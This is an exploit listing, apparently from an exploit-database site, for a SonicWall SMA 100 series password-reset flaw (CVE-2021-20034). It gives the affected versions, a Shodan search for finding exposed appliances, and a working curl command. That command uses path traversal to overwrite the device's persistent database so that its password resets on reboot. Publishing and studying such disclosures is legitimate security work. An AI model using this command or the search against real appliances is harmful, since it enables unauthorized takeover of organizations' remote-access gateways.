SonicWall SMA 10.2.1.0-17sv Password Reset

2021.10.20
Credit: Jacob Baines
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset # Description: Overwrite the persistent database, resulting in password reset on reboot. # Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22 # Date: 10/19/2021 # Exploit Author: Jacob Baines (@Junior_Baines) # Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile # Vendor Homepage: https://www.sonicwall.com/ # Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv # Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv # CVE : CVE-2021-20034 curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top